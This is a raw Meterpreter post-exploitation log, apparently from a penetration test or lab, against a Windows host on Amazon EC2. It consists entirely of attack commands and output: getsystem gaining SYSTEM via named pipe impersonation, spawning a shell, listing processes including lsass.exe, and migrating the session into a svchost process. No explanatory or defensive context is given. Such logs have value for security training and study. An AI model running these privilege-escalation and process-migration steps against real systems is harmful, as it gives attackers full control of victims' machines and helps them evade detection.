escalate:

*/............................................................................................................................................./*
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 2988 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

meterpreter > ps

Process List
============

 PID   PPID  Name         Arch  Session  User               Path
 ---   ----  ----         ----  -------  ----               ----
 0     0     [System Pro
             cess]
 4     0     System       x64   0
 416   4     smss.exe     x64   0        NT AUTHORITY\SYST  \SystemRoot\System
                                         EM                 32\smss.exe
 428   664   LogonUI.exe  x64   1        NT AUTHORITY\SYST  C:\Windows\system3
                                         EM                 2\LogonUI.exe
 476   712   svchost.exe  x64   0        NT AUTHORITY\SYST  C:\Windows\System3
                                         EM                 2\svchost.exe
 484   712   svchost.exe  x64   0        NT AUTHORITY\SYST  C:\Windows\system3
                                         EM                 2\svchost.exe
 564   556   csrss.exe    x64   0        NT AUTHORITY\SYST  C:\Windows\system3
                                         EM                 2\csrss.exe
 612   556   wininit.exe  x64   0        NT AUTHORITY\SYST  C:\Windows\system3
                                         EM                 2\wininit.exe
 624   604   csrss.exe    x64   1        NT AUTHORITY\SYST  C:\Windows\system3
                                         EM                 2\csrss.exe
 664   604   winlogon.ex  x64   1        NT AUTHORITY\SYST  C:\Windows\system3
             e                           EM                 2\winlogon.exe
 708   712   svchost.exe  x64   0        NT AUTHORITY\LOCA  C:\Windows\system3
                                         L SERVICE          2\svchost.exe
 712   612   services.ex  x64   0        NT AUTHORITY\SYST  C:\Windows\system3
             e                           EM                 2\services.exe
 720   612   lsass.exe    x64   0        NT AUTHORITY\SYST  C:\Windows\system3
                                         EM                 2\lsass.exe
 728   612   lsm.exe      x64   0        NT AUTHORITY\SYST  C:\Windows\system3
                                         EM                 2\lsm.exe
 836   712   svchost.exe  x64   0        NT AUTHORITY\SYST  C:\Windows\system3
                                         EM                 2\svchost.exe
 904   712   svchost.exe  x64   0        NT AUTHORITY\NETW  C:\Windows\system3
                                         ORK SERVICE        2\svchost.exe
 952   712   svchost.exe  x64   0        NT AUTHORITY\LOCA  C:\Windows\System3
                                         L SERVICE          2\svchost.exe
 1084  712   svchost.exe  x64   0        NT AUTHORITY\LOCA  C:\Windows\system3
                                         L SERVICE          2\svchost.exe
 1180  712   svchost.exe  x64   0        NT AUTHORITY\NETW  C:\Windows\system3
                                         ORK SERVICE        2\svchost.exe
 1296  712   spoolsv.exe  x64   0        NT AUTHORITY\SYST  C:\Windows\System3
                                         EM                 2\spoolsv.exe
 1344  712   svchost.exe  x64   0        NT AUTHORITY\LOCA  C:\Windows\system3
                                         L SERVICE          2\svchost.exe
 1428  712   amazon-ssm-  x64   0        NT AUTHORITY\SYST  C:\Program Files\A
             agent.exe                   EM                 mazon\SSM\amazon-s
                                                            sm-agent.exe
 1484  712   LiteAgent.e  x64   0        NT AUTHORITY\SYST  C:\Program Files\A
             xe                          EM                 mazon\XenTools\Lit
                                                            eAgent.exe
 1628  712   Ec2Config.e  x64   0        NT AUTHORITY\SYST  C:\Program Files\A
             xe                          EM                 mazon\Ec2ConfigSer
                                                            vice\Ec2Config.exe
 1840  712   TrustedInst  x64   0        NT AUTHORITY\SYST  C:\Windows\servici
             aller.exe                   EM                 ng\TrustedInstalle
                                                            r.exe
 1956  712   svchost.exe  x64   0        NT AUTHORITY\NETW  C:\Windows\system3
                                         ORK SERVICE        2\svchost.exe
 2108  836   WmiPrvSE.ex  x64   0        NT AUTHORITY\NETW  C:\Windows\system3
             e                           ORK SERVICE        2\wbem\wmiprvse.ex
                                                            e
 2512  712   sppsvc.exe   x64   0        NT AUTHORITY\NETW  C:\Windows\system3
                                         ORK SERVICE        2\sppsvc.exe
 2648  712   svchost.exe  x64   0        NT AUTHORITY\SYST  C:\Windows\System3
                                         EM                 2\svchost.exe
 2684  712   vds.exe      x64   0        NT AUTHORITY\SYST  C:\Windows\System3
                                         EM                 2\vds.exe
 2824  712   SearchIndex  x64   0        NT AUTHORITY\SYST  C:\Windows\system3
             er.exe                      EM                 2\SearchIndexer.ex
                                                            e
meterpreter > migrate 1956
[*] Migrating from 1296 to 1956...
[*] Migration completed successfully.

meterpreter>
*/............................................................................................................................................./*

